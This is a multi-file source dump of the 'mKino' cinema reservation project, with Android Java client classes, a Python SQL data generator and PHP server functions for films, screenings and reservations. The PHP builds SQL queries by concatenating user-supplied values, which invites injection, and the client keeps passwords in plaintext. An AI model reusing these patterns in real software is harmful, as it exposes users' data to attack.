hr.air.mkino.core;\r\n\r\nimport hr.air.mkino.R;\r\nimport hr.air.mkino.server.JsonRegistracija;\r\nimport hr.air.mkino.tipovi.Korisnik;\r\nimport android.app.Dialog;\r\nimport android.content.Context;\r\nimport android.view.View;\r\nimport android.view.Window;\r\nimport android.view.View.OnClickListener;\r\nimport android.widget.Button;\r\nimport android.widget.EditText;\r\nimport android.widget.Toast;\r\n/**\r\n * Klasa koja sadrži metode za prikazivanje obrasca za registraciju\r\n * */\r\npublic class Registracija {\r\n\t/*konstante za označavanje identifikacijskog broja pogreške prilikom registracije*/\r\n\tfinal static public int USPJESNA_REGISTRACIJA = 0; /*uspješna registracija */\r\n\tfinal static public int PONOVLJENA_LOZINKA = 1; /*ponovljena lozinka nije jednaka*/\r\n\tfinal static public int KORISNIK_POSTOJI = 4; /*korisnik već postoji */\r\n\tfinal static public int EMAIL_POSTOJI = 5; /*email već postoji*/\r\n\tfinal static public int TELEFON_POSTOJI = 6;\t\t /*telefonski broj već postoji */\r\n\tfinal static public int NEUSPJESNO_REG = 7; /*neuspješno dodavanje kojemu je razlog nepoznat*/\r\n\tfinal static public int KORIME_PRAZNO = 8; /*korisničko ime je prazno */\r\n\tfinal static public int IME_PRAZNO = 9; /*ime je prazno*/\r\n\tfinal static public int PREZIME_PRAZNO = 10; /*prezime je prazno*/\r\n\tfinal static public int LOZINKA_PRAZNA = 11; /*lozinka je prazna*/\r\n\tfinal static public int EMAIL_PRAZAN = 12; /*email je prazan*/\r\n\tfinal static public int TELEFON_PRAZAN = 13; /*telefon je prazan*/\r\n\t\r\n\t \r\n\t/** \r\n\t * Metoda koja prikazuje obrazac za registraciju\r\n\t * @param trenutni Context\r\n\t * */\r\n\tpublic void prikaziDijalog(final Context context) {\r\n\t\t/*otvori dijalog za registraciju*/\r\n\t\tfinal Dialog dialogRegistracija = new Dialog(context);\r\n\t\tdialogRegistracija.requestWindowFeature(Window.FEATURE_NO_TITLE);\r\n\t\tdialogRegistracija.setContentView(R.layout.dialog_registracija);\r\n\t\tdialogRegistracija.show();\r\n\r\n\t\t/*dohvaćanje unešenih podataka*/\r\n\t\tButton btnRegistrirajSe = (Button) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.registracija_btnRegistrirajSe);\r\n\t\tButton btnOdustani = (Button) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.registracija_btnOdustani);\r\n\r\n\t\tfinal EditText txtKorisnickoIme = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtKorisnickoIme);\r\n\t\tfinal EditText txtLozinka = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtLozinka);\r\n\t\tfinal EditText txtPonovljenaLozinka = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtPonovljenaLozinka);\r\n\t\tfinal EditText txtIme = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtIme);\r\n\t\tfinal EditText txtPrezime = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtPrezime);\r\n\t\tfinal EditText txtEmail = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtEmail);\r\n\t\tfinal EditText txtTelefon = (EditText) dialogRegistracija\r\n\t\t\t\t.findViewById(R.id.dialog_registracija_txtTelefon);\r\n\r\n\t\t/*izlazak iz dijaloga*/\r\n\t\tbtnOdustani.setOnClickListener(new OnClickListener() {\r\n\r\n\t\t\t@Override\r\n\t\t\tpublic void onClick(View v) {\r\n\t\t\t\tdialogRegistracija.dismiss();\r\n\t\t\t}\r\n\t\t});\r\n\t\t\r\n\t\t/*registracija*/\r\n\t\tbtnRegistrirajSe.setOnClickListener(new OnClickListener() {\r\n\r\n\t\t\t@Override\r\n\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t/*parsiranje korisničkog unosa u formu*/\r\n\t\t\t\tString korisnickoIme = txtKorisnickoIme.getText().toString();\r\n\t\t\t\tString lozinka = txtLozinka.getText().toString();\r\n\t\t\t\tString ponovljenaLozinka = txtPonovljenaLozinka.getText().toString();\r\n\t\t\t\tString ime = txtIme.getText().toString();\r\n\t\t\t\tString prezime = txtPrezime.getText().toString();\r\n\t\t\t\tString email = txtEmail.getText().toString();\r\n\t\t\t\tString telefon = txtTelefon.getText().toString();\t\t\t\r\n\t\t\t\t\r\n\t\t\t\tKorisnik korisnik = new Korisnik(korisnickoIme, lozinka, ime, prezime, email, telefon);\t\r\n\t\t\t\t\r\n\t\t\t\t/*izvršavanje registracije i obavještavanje korisnika o uspješnosti*/\r\n\t\t\t\tswitch(IzvrsiRegistraciju(korisnik, ponovljenaLozinka))\r\n\t\t\t\t{\r\n\t\t\t\t\tcase USPJESNA_REGISTRACIJA: \r\n\t\t\t\t\t\tToast.makeText(context, \"Uspješna registracija!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tdialogRegistracija.dismiss();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase PONOVLJENA_LOZINKA: \r\n\t\t\t\t\t\tToast.makeText(context, \"Lozinke nisu jednake!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\t\t\t\t\r\n\t\t\t\t\tcase KORISNIK_POSTOJI: \r\n\t\t\t\t\t\tToast.makeText(context, \"Korisničko ime zauzeto!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase EMAIL_POSTOJI: \r\n\t\t\t\t\t\tToast.makeText(context, \"e-mail zauzet!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase TELEFON_POSTOJI:\r\n\t\t\t\t\t\tToast.makeText(context, \"telefon zauzet!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase NEUSPJESNO_REG: \r\n\t\t\t\t\t\tToast.makeText(context, \"Registracija nije uspjela! Pokušajte ponovno.\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase KORIME_PRAZNO: \r\n\t\t\t\t\t\tToast.makeText(context, \"Molimo Vas, unesite korisničko ime!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase IME_PRAZNO: \r\n\t\t\t\t\t\tToast.makeText(context, \"Molimo Vas, unesite ime!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase PREZIME_PRAZNO: \r\n\t\t\t\t\t\tToast.makeText(context, \"Molimo Vas, unesite prezime!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase LOZINKA_PRAZNA: \r\n\t\t\t\t\t\tToast.makeText(context, \"Molimo Vas, unesite lozinku!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase EMAIL_PRAZAN: \r\n\t\t\t\t\t\tToast.makeText(context, \"Molimo Vas, unesite email!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tcase TELEFON_PRAZAN: \r\n\t\t\t\t\t\tToast.makeText(context, \"Molimo Vas, unesite telefon!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tdefault: \r\n\t\t\t\t\t\tToast.makeText(context, \"Registracija nije uspjela! Pokušajte ponovno.\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t}\r\n\t\t});\r\n\r\n\t}\r\n\r\n\t/**\r\n\t * Metoda koja izvršava registraciju korisnika putem POST metode. \r\n\t * Prvo se podaci validiraju na korisničkoj strani, a\r\n\t * ukoliko dođe do pogreške vraća se broj pogreške ovisno o odgovoru kojeg\r\n\t * vraća servis prilikom validacije i unosa u bazu\r\n\t * \r\n\t * @param objekt tipka Korisnik sa popunjenim podacima i ponovljena lozinka za validaciju\r\n\t * @return \r\n\t *\t USPJESNA_REGISTRACIJA = 0; \r\n\t *\t PONOVLJENA_LOZINKA = 1;\r\n\t *\t KORISNIK_POSTOJI = 4;\r\n\t *\t EMAIL_POSTOJI = 5;\r\n\t *\t TELEFON_POSTOJI = 6;\r\n\t *\t NEUSPJESNO_REG = 7;\r\n\t *\t KORIME_PRAZNO = 8;\r\n\t *\t IME_PRAZNO = 9;\r\n\t *\t PREZIME_PRAZNO = 10;\r\n\t *\t LOZINKA_PRAZNA = 11;\r\n\t *\t EMAIL_PRAZAN = 12;\r\n\t * \t TELEFON_PRAZAN = 13;\r\n\t */\r\n\tpublic int IzvrsiRegistraciju(Korisnik korisnik, String ponovljenaLozinka) {\r\n\t\t\r\n\t\t/*validacija korisničkog unosa*/\r\n\t\tif (korisnik.getKorisnickoIme().length() == 0 || korisnik.getKorisnickoIme() == null) \r\n\t\t\treturn 8;\r\n\t\tif (ponovljenaLozinka.length() == 0 || ponovljenaLozinka == null)\r\n\t\t\treturn 11;\r\n\t\tif(korisnik.getLozinka().length() == 0 || korisnik.getLozinka() == null)\r\n\t\t\treturn 11;\r\n\t\tif (korisnik.getIme().length() == 0 || korisnik.getIme() == null)\r\n\t\t\treturn 9;\r\n\t\tif (korisnik.getPrezime().length() == 0 || korisnik.getPrezime() == null)\r\n\t\t\treturn 10;\r\n\t\tif (korisnik.getLozinka().length() == 0 || korisnik.getLozinka() == null)\r\n\t\t\treturn 11;\t\t\r\n\t\tif (korisnik.getEmail().length() == 0 || korisnik.getEmail() == null)\r\n\t\t\treturn 12;\r\n\t\tif(korisnik.getTelefon().length() == 0 || korisnik.getTelefon() == null)\r\n\t\t\treturn 13;\t\t\r\n\t\tif(!ponovljenaLozinka.equals(korisnik.getLozinka()))\r\n\t\t\treturn 1;\r\n\t\t\r\n\t\tJsonRegistracija jsonReg = new JsonRegistracija();\r\n\t\t/*provjera na korisničkoj strani je uspješno izvršena, izvršavamo registraciju putem post metode*/\r\n\t\tint uspjesnaRegistracija = jsonReg.registriraj(korisnik);\r\n\t\t\r\n\t\treturn uspjesnaRegistracija;\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.6276476979255676, "alphanum_fraction": 0.6867335438728333, "avg_line_length": 43.849998474121094, "blob_id": "2243907dc549402c914bd57345bf023a9456a51b", "content_id": "ff7c6c03ae9ebb5ab254390a288bb1a6b7fe349d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 898, "license_type": "no_license", "max_line_length": 210, "num_lines": 20, "path": "/server-side/Baza/generiranjeProjekcija.py", "repo_name": "dsitum/mKino", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3.3\n\nimport random\n\ns = \"Insert into projekcijefilmova (dvorana, film, vrijemePocetka, cijena) values \"\n\nfor k in range(9, 24, 2): # 8 puta. vrijeme\n\tfor i in range(2, 22): # svi filmovi\n\t\tsvakiFilmUXDvorana = random.randint(10, 15) #uključive obje granice\n\t\tiskoristeneDvoraneUTerminu = set()\n\t\tfor j in range(svakiFilmUXDvorana):\n\t\t\t# biramo dvoranu\n\t\t\tdvorana = random.randint(1, 80)\n\t\t\twhile ((dvorana > 26 and dvorana < 35) or (dvorana > 49 and dvorana < 58) or (dvorana > 65 and dvorana < 76) or (dvorana in iskoristeneDvoraneUTerminu)):\n\t\t\t\tdvorana = random.randint(1, 80)\n\t\t\tiskoristeneDvoraneUTerminu.add(dvorana)\n\t\t\ts += \"({dv}, {film}, '2014-01-{dan} {sat}:{minuta}:00', {cijena}), \".format(dv=dvorana, film=i, dan=random.randint(1, 10), sat=k, minuta=str(random.randint(0,1)*30).zfill(2), cijena=25+random.randint(0,2)*5)\n\nwith open('sve.sql', 'w') as f:\n\tf.write(s)\n" }, { "alpha_fraction": 0.7694393992424011, "alphanum_fraction": 0.7703436017036438, "avg_line_length": 49.46511459350586, "blob_id": "72fd464774ef57f51799a701ea1cf3b65668dd6d", "content_id": "fd28d49a813c986893bb73aed433217f7f792636", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2219, "license_type": "no_license", "max_line_length": 225, "num_lines": 43, "path": "/client-side/src/hr/air/mkino/baza/DbHelper.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.baza;\r\n\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\n\r\nimport android.content.Context;\r\nimport android.database.sqlite.SQLiteDatabase;\r\nimport android.database.sqlite.SQLiteDatabase.CursorFactory;\r\nimport android.database.sqlite.SQLiteOpenHelper;\r\n\r\n/**\r\n * Ova klasa služi za ostvarivanje pristupa lokalnoj bazi podataka. Kada se instancira ovaj objekt, stvaraju se sve potrebne tablice kako bi bile spremne za postupak čitanja/pisanja\r\n * @author domagoj\r\n *\r\n */\r\npublic class DbHelper extends SQLiteOpenHelper {\r\n\r\n\tpublic DbHelper(Context context, String name, CursorFactory factory,\r\n\t\t\tint version) {\r\n\t\tsuper(context, name, factory, version);\r\n\t}\r\n\t\r\n\t// prilikom stvaranja instance se stvaraju i sve potrebne tablice\r\n\t@Override\r\n\tpublic void onCreate(SQLiteDatabase db) {\r\n\t\tList<String> tablice = new ArrayList<String>();\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS multipleksi (idMultipleksa INTEGER PRIMARY KEY, naziv TEXT, oznaka TEXT, zemljopisnaDuzina REAL, zemljopisnaSirina REAL)\");\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS korisnik (idKorisnika INTEGER PRIMARY KEY, korisnickoIme TEXT, ime TEXT, prezime TEXT, email TEXT, telefon TEXT)\");\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS filmovi (idFilma INTEGER PRIMARY KEY, naziv TEXT, opis TEXT, redatelj TEXT, glavneUloge TEXT, trajanje INTEGER, godina INTEGER, aktualno INTEGER, zanr TEXT)\");\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS projekcije(idProjekcije INTEGER PRIMARY KEY, dvorana INTEGER, film INTEGER CONSTRAINT fk55 REFERENCES filmovi(idFilma), vrijemePocetka DATETIME, cijena INTEGER, multipleks INTEGER)\");\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS odabranimultipleks (id INTEGER)\");\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS mojaRezervacija (idRezervacije INTEGER, idProjekcije INTEGER, korisnickoIme TEXT, kodRezervacije TEXT, sjedalo INTEGER)\");\r\n\t\ttablice.add(\"CREATE TABLE IF NOT EXISTS prijavljenikorisnik (korisnickoIme TEXT, lozinka TEXT)\");\r\n\t\t\r\n\t\tfor (String tablica : tablice)\r\n\t\t\tdb.execSQL(tablica);\r\n\t}\r\n\r\n\t@Override\r\n\tpublic void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) {\r\n\t\t// ovo mora biti ovdje, unatoč tome što zasad ne treba i što možda neće trebati\r\n\t}\r\n}\n" }, { "alpha_fraction": 0.712106466293335, "alphanum_fraction": 0.712431013584137, "avg_line_length": 26.794391632080078, "blob_id": "da9f83eeaf6ab4d2cdf2ed7d7dfaf22aec95fca9", "content_id": "8d7118eb8ff036bbfeba0c9b8757c876f411fa9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3087, "license_type": "no_license", "max_line_length": 119, "num_lines": 107, "path": "/client-side/src/hr/air/mkino/server/JsonMultipleksi.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\nimport hr.air.mkino.tipovi.MultipleksInfo;\r\n\r\nimport java.io.IOException;\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\nimport java.util.concurrent.ExecutionException;\r\n\r\nimport org.apache.http.client.ClientProtocolException;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.ResponseHandler;\r\nimport org.apache.http.client.methods.HttpGet;\r\nimport org.apache.http.impl.client.BasicResponseHandler;\r\nimport org.apache.http.impl.client.DefaultHttpClient;\r\nimport org.json.JSONArray;\r\nimport org.json.JSONException;\r\nimport org.json.JSONObject;\r\n\r\nimport android.os.AsyncTask;\r\n\r\n/**\r\n * Ova klasa služi za dohvat svih multipleksa sa web servisa.\r\n * @author domagoj\r\n *\r\n */\r\npublic class JsonMultipleksi extends AsyncTask<Void, Void, String> {\r\n\t/**\r\n\t * Dohvaća multiplekse sa web servisa\r\n\t * @return lista multipleksa\r\n\t */\r\n\tpublic List<MultipleksInfo> dohvatiMultiplekse()\r\n\t{\r\n\t\t// dohvatiti podatke s web servsa\t\t\r\n\t\tthis.execute();\r\n\t\tString jsonRezultat = \"\";\r\n\t\ttry {\r\n\t\t\tjsonRezultat = this.get();\r\n\t\t} catch (InterruptedException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (ExecutionException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\tList<MultipleksInfo> multipleksi = parsirajJson(jsonRezultat);\r\n\t\treturn multipleksi;\r\n\t}\r\n\r\n\t/**\r\n\t * Parsira JSON string dohvaćen s web servisa\r\n\t * @param jsonRezultat\r\n\t * @return multipleksi\r\n\t */\r\n\tprivate List<MultipleksInfo> parsirajJson(String jsonRezultat) {\r\n\t\tList<MultipleksInfo> multipleksi = new ArrayList<MultipleksInfo>();\r\n\t\tint idMultipleksa;\r\n\t\tString naziv;\r\n\t\tString oznaka;\r\n\t\tfloat zemljopisnaDuzina;\r\n\t\tfloat zemljopisnaSirina;\r\n\t\t\r\n\t\ttry {\r\n\t\t\tJSONArray mpleksi = new JSONArray(jsonRezultat);\r\n\t\t\tint n = mpleksi.length();\r\n\t\t\tfor(int i=0; i<n; i++)\r\n\t\t\t{\r\n\t\t\t\tJSONObject mpleks = mpleksi.getJSONObject(i);\r\n\t\t\t\tidMultipleksa = mpleks.getInt(\"idMultipleksa\");\r\n\t\t\t\tnaziv = mpleks.getString(\"naziv\");\r\n\t\t\t\toznaka = mpleks.getString(\"oznaka\");\r\n\t\t\t\tzemljopisnaDuzina = Float.valueOf(mpleks.getString(\"zemljopisnaDuzina\"));\r\n\t\t\t\tzemljopisnaSirina = Float.valueOf(mpleks.getString(\"zemljopisnaSirina\"));\r\n\t\t\t\tMultipleksInfo multipleks = new MultipleksInfo(idMultipleksa, naziv, oznaka, zemljopisnaDuzina, zemljopisnaSirina);\r\n\t\t\t\t\r\n\t\t\t\tmultipleksi.add(multipleks);\r\n\t\t\t}\r\n\t\t} \r\n\t\tcatch (JSONException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\treturn multipleksi;\r\n\t}\r\n\r\n\t// pomoćna metoda koja u pozadini obrađuje http zahtjev (dohvaćanje podataka)\r\n\t@Override\r\n\tprotected String doInBackground(Void... params) {\r\n\t\tHttpClient httpKlijent = new DefaultHttpClient();\r\n\t\tHttpGet httpZahtjev = new HttpGet(\"http://mkinoairprojekt.me.pn/skripte/index.php?tip=multipleksi\");\r\n\t\t\r\n\t\tString jsonResult = \"\";\r\n\t\tResponseHandler<String> handler = new BasicResponseHandler();\r\n\t\t\r\n\t\ttry {\r\n\t\t\tjsonResult = httpKlijent.execute(httpZahtjev, handler);\r\n\t\t}\r\n\t\tcatch(ClientProtocolException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\tcatch(IOException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\thttpKlijent.getConnectionManager().shutdown();\r\n\t\treturn jsonResult;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.4762108027935028, "alphanum_fraction": 0.4795178174972534, "avg_line_length": 47.87234115600586, "blob_id": "7e18d80d748f9dc9e8ec70e4d57c3863c2d18a73", "content_id": "0f53e17d92a3648d6228ffc0da453ab9ba00ff8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 9375, "license_type": "no_license", "max_line_length": 370, "num_lines": 188, "path": "/server-side/Datoteke/skripte/filmovi.php", "repo_name": "dsitum/mKino", "src_encoding": "UTF-8", "text": "<?php\r\n class Filmovi\r\n {\r\n public static function DohvatiFilmove($aktualno)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idFilma, filmovi.naziv as naziv, opis, redatelj, glavneUloge, trajanje, godina, zanrovi.naziv as zanr, aktualno FROM filmovi JOIN zanrovi ON (filmovi.zanr = zanrovi.idZanra) WHERE aktualno = \" . $aktualno;\r\n \r\n $filmovi = UpitUBazu($upit);\r\n return $filmovi;\r\n }\r\n public static function DohvatiRezervacije($korisnik)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idKorisnika FROM korisnici WHERE korisnickoIme = '$korisnik'\";\r\n $idKorisnika = UpitUBazu($upit);\r\n $upit = \"SELECT * FROM rezervacije LEFT JOIN projekcijefilmova ON rezervacije.projekcija = projekcijefilmova.idProjekcije WHERE projekcijefilmova.vrijemePocetka >= NOW() AND korisnik = \" . $idKorisnika[0]['idKorisnika'] . \" ORDER BY rezervacije.projekcija\";\r\n $projekcije = UpitUBazu($upit);\r\n return $projekcije;\r\n }\r\n \r\n public static function DohvatiNekeFilmove($aktualno, $bezOvih)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idFilma, filmovi.naziv as naziv, opis, redatelj, glavneUloge, trajanje, godina, zanrovi.naziv as zanr, aktualno FROM filmovi JOIN zanrovi ON (filmovi.zanr = zanrovi.idZanra)\";\r\n \r\n $filmovi = UpitUBazu($upit);\r\n \r\n $bezOvihFilmovaTmp = json_decode($bezOvih);\r\n $bezOvihFilmova = array();\r\n foreach($bezOvihFilmovaTmp as $bezOvog)\r\n $bezOvihFilmova[] = $bezOvog->{'idFilma'};\r\n \r\n $samoOviFilmovi = array();\r\n \r\n foreach($filmovi as $film)\r\n {\r\n $idFilma = $film[\"idFilma\"];\r\n if (! in_array($idFilma, $bezOvihFilmova) && $film[\"aktualno\"] == 1)\r\n {\r\n $samoOviFilmovi[] = $film;\r\n }\r\n \r\n if (in_array($idFilma, $bezOvihFilmova) && $film[\"aktualno\"] == 0)\r\n {\r\n $samoOviFilmovi[] = $film;\r\n }\r\n }\r\n \r\n return $samoOviFilmovi;\r\n }\r\n \r\n public static function DohvatiSveProjekcije($film, $multipleks)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idProjekcije, vrijemePocetka, cijena, brojDvorane FROM projekcijefilmova JOIN dvorane ON (projekcijefilmova.dvorana = dvorane.idDvorane) JOIN multipleksi ON (dvorane.multipleks = multipleksi.idMultipleksa) WHERE projekcijefilmova.film = $film AND dvorane.multipleks = $multipleks AND DATE(vrijemePocetka) >= DATE(DATE_ADD(NOW(), INTERVAL 1 HOUR))\";\r\n $projekcije = UpitUBazu($upit);\r\n return $projekcije;\r\n }\r\n \r\n public static function DohvatiProjekcijeNaDan($film, $multipleks, $datum)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idProjekcije, vrijemePocetka, cijena, brojDvorane FROM projekcijefilmova JOIN dvorane ON (projekcijefilmova.dvorana = dvorane.idDvorane) JOIN multipleksi ON (dvorane.multipleks = multipleksi.idMultipleksa) WHERE projekcijefilmova.film = $film AND dvorane.multipleks = $multipleks AND DATE(vrijemePocetka) = '$datum'\";\r\n $projekcije = UpitUBazu($upit);\r\n return $projekcije;\r\n }\r\n public static function DohvatiProjekcijeMultipleks($multipleks, $bezOvih)\r\n {\r\n require_once 'DB_connect.php';\r\n $danasnjiDatum = date('Y-m-d H:i:s', time());\r\n $danasnjiDatum = date('Y-m-d', strtotime($danasnjiDatum . '+ 30 minute'));\r\n $iduca2Tjedna = date('Y-m-d', strtotime($danasnjiDatum . '+ 14 day'));\r\n $upit = \"SELECT p.idProjekcije, p.film, p.vrijemePocetka, p.cijena, d.brojDvorane, d.multipleks FROM projekcijefilmova AS p LEFT JOIN dvorane AS d ON p.dvorana = d.idDvorane WHERE d.multipleks = $multipleks AND p.vrijemePocetka >= DATE_ADD(NOW(), INTERVAL 1 HOUR) ORDER BY p.film ASC , `p`.`vrijemePocetka` ASC\";\r\n $projekcije = UpitUBazu($upit);\r\n \r\n try{\r\n $bezOvihProjekcijaTmp = json_decode($bezOvih);\r\n $bezOvihProjekcija = array();\r\n if(!empty($bezOvihProjekcijaTmp))\r\n {\r\n foreach($bezOvihProjekcijaTmp as $bezOvog)\r\n $bezOvihProjekcija[] = $bezOvog->{'idProjekcije'};\r\n }\r\n }\r\n catch( Exception $e){\r\n \r\n }\r\n $samoOveProjekcije = array();\r\n \r\n foreach($projekcije as $projekcija)\r\n {\r\n \r\n if(($projekcija['vrijemePocetka'] >= $danasnjiDatum) && ($projekcija['vrijemePocetka'] <= $iduca2Tjedna))\r\n {\r\n $uvjet = true;\r\n }\r\n else \r\n {\r\n $uvjet=false;\r\n }\r\n \r\n \r\n \r\n $idProjekcije = $projekcija[\"idProjekcije\"];\r\n if (! in_array($idProjekcije, $bezOvihProjekcija) && ($uvjet == true))\r\n {\r\n \r\n $samoOveProjekcije[] = $projekcija;\r\n }\r\n if ( in_array($idProjekcije, $bezOvihProjekcija)&& ($uvjet == false))\r\n {\r\n $samoOveProjekcije[] = $projekcija;\r\n }\r\n } \r\n return $samoOveProjekcije; \r\n }\r\n public static function DohvatiSjedalaProjekcija($projekcija)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT brojSjedala FROM rezervacije WHERE projekcija =\".$projekcija.\" order by brojSjedala\";\r\n \r\n $projekcije = UpitUBazu($upit);\r\n return $projekcije;\r\n }\r\n public static function Rezerviraj($projekcija, $korisnik, $sjedalaJSON)\r\n {\r\n \r\n $zapis = array();\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idKorisnika FROM korisnici WHERE korisnickoIme = '\".$korisnik.\"'\";\r\n \r\n $idKorisnika = UpitUBazu($upit); \r\n \r\n $sjedalaTmp = json_decode($sjedalaJSON); \r\n $sjedala = array();\r\n \r\n $kodRezervacije = $idKorisnika[0]['idKorisnika'] .\"-\".$projekcija;\r\n \r\n $zauzetoMjesto = 0;\r\n for($i = 0; $i < count(sjedalaTmp); $i++)\r\n {\r\n $upit = \"SELECT * FROM rezervacije WHERE projekcija =\".$projekcija.\" AND brojSjedala=\".(string)$sjedalaTmp[$i]->{'sjedalo'}.\"\";\r\n $rezervacije = UpitUBazu($upit);\r\n if($rezervacije[0][povratnaInformacijaId] !== 1) $zauzetoMjesto=1; \r\n \r\n } \r\n \r\n if($zauzetoMjesto === 0)\r\n {\r\n for($i = 0; $i < sizeof($sjedalaTmp,1); $i++)\r\n {\r\n $upit = \"INSERT INTO rezervacije VALUES (DEFAULT,\".$projekcija.\", \".(string)$idKorisnika[0]['idKorisnika'].\", \".(string)$sjedalaTmp[$i]->{'sjedalo'}.\", '\".$kodRezervacije.\"')\";\r\n $uspjesnost = Transakcija($upit);\r\n \r\n }\r\n if($uspjesnost === -6)\r\n {\r\n $zapis[0] = array(\"povratnaInformacijaId\" => -6, \"povratnaInformacijaTekst\" => utf8_encode(\"Rezervacija nije uspjela!\"));\r\n \r\n }\r\n else\r\n {\r\n $zapis[0] = array(\"povratnaInformacijaId\" => $kodRezervacije , \"povratnaInformacijaTekst\" => utf8_encode(\"Rezervacija uspjesna!\"));\r\n }\r\n }\r\n else\r\n {\r\n $zapis[0] = array(\"povratnaInformacijaId\" => -7, \"povratnaInformacijaTekst\" => utf8_encode(\"Ulaznice u međuvremenu rezervirane!\"));\r\n } \r\n return $zapis;\r\n }\r\n \r\n \r\n public static function ObrisiMojuRezervaciju($korisnik, $idProjekcije)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idKorisnika FROM korisnici WHERE korisnickoIme = '$korisnik'\";\r\n $idKorisnikaTmp = UpitUBazu($upit);\r\n\t\t\t\t\t$idKorisnika = $idKorisnikaTmp[0]['idKorisnika'];\r\n \r\n $upit = \"DELETE FROM rezervacije WHERE kod='$idKorisnika-$idProjekcije'\";\r\n $uspjelo = BrisanjeIzBaze($upit);\r\n return $uspjelo;\r\n }\r\n \r\n}\r\n?>" }, { "alpha_fraction": 0.7423256039619446, "alphanum_fraction": 0.7423256039619446, "avg_line_length": 26.289474487304688, "blob_id": "a525832e749adc605296d84ebca55b0467a5046a", "content_id": "32cb993002ea188fbed96672f3ee436c441f3b7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1078, "license_type": "no_license", "max_line_length": 199, "num_lines": 38, "path": "/client-side/src/hr/air/mkino/tipovi/MultipleksInfo.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.tipovi;\r\n\r\n/**\r\n * Ova klasa predstavlja tip podataka koji opisuje pojedini multipleks. Između ostalih podataka se nalaze i svi getteri, dok se jednom uneseni podaci (koristeći konstruktor) ne mogu više promijeniti \r\n * @author domagoj\r\n *\r\n */\r\npublic class MultipleksInfo {\r\n\tprivate int idMultipleksa;\r\n\tprivate String naziv;\r\n\tprivate String oznaka;\r\n\tprivate float zemljopisnaDuzina;\r\n\tprivate float zemljopisnaSirina;\r\n\t\r\n\tpublic MultipleksInfo(int idMultipleksa, String naziv, String oznaka, float zemljopisnaDuzina, float zemljopisnaSirina) {\r\n\t\tthis.idMultipleksa = idMultipleksa;\r\n\t\tthis.naziv = naziv;\r\n\t\tthis.oznaka = oznaka;\r\n\t\tthis.zemljopisnaDuzina = 